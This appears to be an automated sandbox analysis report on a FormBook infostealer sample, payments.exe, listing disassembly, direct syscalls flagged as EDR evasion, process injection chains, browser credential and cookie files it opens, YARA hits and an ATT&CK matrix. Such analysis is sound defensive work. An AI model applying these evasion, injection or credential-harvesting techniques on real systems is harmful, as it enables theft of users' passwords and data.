                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D4978 mov eax, dword ptr fs:[00000030h]2_2_037D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D4978 mov eax, dword ptr fs:[00000030h]2_2_037D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BC97C mov eax, dword ptr fs:[00000030h]2_2_037BC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03756962 mov eax, dword ptr fs:[00000030h]2_2_03756962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03756962 mov eax, dword ptr fs:[00000030h]2_2_03756962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03756962 mov eax, dword ptr fs:[00000030h]2_2_03756962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377096E mov eax, dword ptr fs:[00000030h]2_2_0377096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377096E mov edx, dword ptr fs:[00000030h]2_2_0377096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377096E mov eax, dword ptr fs:[00000030h]2_2_0377096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B0946 mov eax, dword ptr fs:[00000030h]2_2_037B0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B892A mov eax, dword ptr fs:[00000030h]2_2_037B892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C892B mov eax, dword ptr fs:[00000030h]2_2_037C892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BC912 mov eax, dword ptr fs:[00000030h]2_2_037BC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728918 mov eax, dword ptr fs:[00000030h]2_2_03728918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728918 mov eax, dword ptr fs:[00000030h]2_2_03728918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE908 mov eax, dword ptr fs:[00000030h]2_2_037AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE908 mov eax, dword ptr fs:[00000030h]2_2_037AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037629F9 mov eax, dword ptr fs:[00000030h]2_2_037629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037629F9 mov eax, dword ptr fs:[00000030h]2_2_037629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BE9E0 mov eax, dword ptr fs:[00000030h]2_2_037BE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]2_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]2_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]2_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]2_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]2_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]2_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037649D0 mov eax, dword ptr fs:[00000030h]2_2_037649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FA9D3 mov eax, dword ptr fs:[00000030h]2_2_037FA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C69C0 mov eax, dword ptr fs:[00000030h]2_2_037C69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804940 mov eax, dword ptr fs:[00000030h]2_2_03804940
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B89B3 mov esi, dword ptr fs:[00000030h]2_2_037B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B89B3 mov eax, dword ptr fs:[00000030h]2_2_037B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B89B3 mov eax, dword ptr fs:[00000030h]2_2_037B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037309AD mov eax, dword ptr fs:[00000030h]2_2_037309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037309AD mov eax, dword ptr fs:[00000030h]2_2_037309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BE872 mov eax, dword ptr fs:[00000030h]2_2_037BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BE872 mov eax, dword ptr fs:[00000030h]2_2_037BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6870 mov eax, dword ptr fs:[00000030h]2_2_037C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6870 mov eax, dword ptr fs:[00000030h]2_2_037C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03760854 mov eax, dword ptr fs:[00000030h]2_2_03760854
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734859 mov eax, dword ptr fs:[00000030h]2_2_03734859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734859 mov eax, dword ptr fs:[00000030h]2_2_03734859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03742840 mov ecx, dword ptr fs:[00000030h]2_2_03742840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03752835 mov eax, dword ptr fs:[00000030h]2_2_03752835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03752835 mov eax, dword ptr fs:[00000030h]2_2_03752835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03752835 mov eax, dword ptr fs:[00000030h]2_2_03752835
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CCA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00CCA66C
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CB8189 SetUnhandledExceptionFilter,0_2_00CB8189
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CB81AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00CB81AC

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exeNtProtectVirtualMemory: Direct from: 0x77542F9CJump to behavior
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exeNtSetInformationProcess: Direct from: 0x77542C5CJump to behavior
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exeNtOpenKeyEx: Direct from: 0x77542B9CJump to behavior
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exeNtProtectVirtualMemory: Direct from: 0x77537B2EJump to behavior
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exeNtCreateFile: Direct from: 0x77542FECJump to behavior
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exeNtOpenFile: Direct from: 0x77542DCCJump to behavior
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exeNtQueryInformationToken: Direct from: 0x77542CACJump to behavior
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exeNtTerminateThread: Direct from: 0x77542FCCJump to behavior
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exeNtDeviceIoControlFile: Direct from: 0x77542AECJump to behavior
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exeNtQueryValueKey: Direct from: 0x77542BECJump to behavior
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exeNtQueryVolumeInformationFile: Direct from: 0x77542F2CJump to behavior
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exeNtOpenSection: Direct from: 0x77542E0CJump to behavior
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exeNtAllocateVirtualMemory: Direct from: 0x775448ECJump to behavior
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exeNtSetInformationThread: Direct from: 0x775363F9Jump to behavior
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exeNtQuerySystemInformation: Direct from: 0x775448CCJump to behavior
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exeNtClose: Direct from: 0x77542B6C
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exeNtReadVirtualMemory: Direct from: 0x77542E8CJump to behavior
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exeNtCreateKey: Direct from: 0x77542C6CJump to behavior
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exeNtSetInformationThread: Direct from: 0x77542B4CJump to behavior
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exeNtQueryAttributesFile: Direct from: 0x77542E6CJump to behavior
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exeNtOpenKeyEx: Direct from: 0x77543C9CJump to behavior
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exeNtCreateUserProcess: Direct from: 0x7754371CJump to behavior
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exeNtQueryInformationProcess: Direct from: 0x77542C26Jump to behavior
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exeNtResumeThread: Direct from: 0x77542FBCJump to behavior
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exeNtWriteVirtualMemory: Direct from: 0x7754490CJump to behavior
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exeNtDelayExecution: Direct from: 0x77542DDCJump to behavior
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exeNtAllocateVirtualMemory: Direct from: 0x77542BFCJump to behavior
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exeNtReadFile: Direct from: 0x77542ADCJump to behavior
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exeNtQuerySystemInformation: Direct from: 0x77542DFCJump to behavior
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exeNtResumeThread: Direct from: 0x775436ACJump to behavior
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exeNtNotifyChangeKey: Direct from: 0x77543C2CJump to behavior
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exeNtCreateMutant: Direct from: 0x775435CCJump to behavior
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exeNtWriteVirtualMemory: Direct from: 0x77542E3CJump to behavior
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exeNtMapViewOfSection: Direct from: 0x77542D1CJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\payments.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\pcaui.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: NULL target: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: NULL target: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\pcaui.exeThread register set: target process: 7900Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\pcaui.exeThread APC queued: target process: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exeJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\payments.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2D1F008Jump to behavior
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CCB106 LogonUserW,0_2_00CCB106
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00C93D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00C93D19
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CD411C SendInput,keybd_event,0_2_00CD411C
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CD74E7 mouse_event,0_2_00CD74E7
                Source: C:\Users\user\Desktop\payments.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\payments.exe"Jump to behavior
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exeProcess created: C:\Windows\SysWOW64\pcaui.exe "C:\Windows\SysWOW64\pcaui.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CCA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00CCA66C
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CD71FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00CD71FA
                Source: XhwUfLdILQipZF.exe, 00000003.00000002.3798645049.0000000001651000.00000002.00000001.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000003.00000000.1375336937.0000000001651000.00000002.00000001.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3798657257.0000000001861000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                Source: payments.exe, XhwUfLdILQipZF.exe, 00000003.00000002.3798645049.0000000001651000.00000002.00000001.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000003.00000000.1375336937.0000000001651000.00000002.00000001.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3798657257.0000000001861000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: XhwUfLdILQipZF.exe, 00000003.00000002.3798645049.0000000001651000.00000002.00000001.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000003.00000000.1375336937.0000000001651000.00000002.00000001.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3798657257.0000000001861000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: payments.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                Source: XhwUfLdILQipZF.exe, 00000003.00000002.3798645049.0000000001651000.00000002.00000001.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000003.00000000.1375336937.0000000001651000.00000002.00000001.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3798657257.0000000001861000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CB65C4 cpuid 0_2_00CB65C4
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CE091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,0_2_00CE091D
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00D0B340 GetUserNameW,0_2_00D0B340
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CC1E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00CC1E8E
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CADDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00CADDC0

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.3800852385.00000000043C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1455387044.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3793634224.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3800786167.0000000004370000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3803049222.0000000005620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1456263515.0000000004800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1455910755.0000000003620000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3800781510.0000000003710000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\pcaui.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\pcaui.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: payments.exeBinary or memory string: WIN_81
                Source: payments.exeBinary or memory string: WIN_XP
                Source: payments.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
                Source: payments.exeBinary or memory string: WIN_XPe
                Source: payments.exeBinary or memory string: WIN_VISTA
                Source: payments.exeBinary or memory string: WIN_7
                Source: payments.exeBinary or memory string: WIN_8

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.3800852385.00000000043C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1455387044.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3793634224.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3800786167.0000000004370000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3803049222.0000000005620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1456263515.0000000004800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1455910755.0000000003620000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3800781510.0000000003710000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CE8C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00CE8C4F
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CE923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00CE923B

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts                		3
                Native API                		1
                DLL Side-Loading                		1
                Exploitation for Privilege Escalation                		1
                Disable or Modify Tools                		1
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		4
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts2
                Command and Scripting Interpreter                		2
                Valid Accounts                		1
                Abuse Elevation Control Mechanism                		1
                Deobfuscate/Decode Files or Information                		21
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Data from Local System                		1
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		1
                Abuse Elevation Control Mechanism                		Security Account Manager2
                File and Directory Discovery                		SMB/Windows Admin Shares1
                Email Collection                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts                		3
                Obfuscated Files or Information                		NTDS116
                System Information Discovery                		Distributed Component Object Model21
                Input Capture                		4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation                		1
                DLL Side-Loading                		LSA Secrets151
                Security Software Discovery                		SSH3
                Clipboard Data                		Fallback ChannelsScheduled TransferData Encrypted for Impact
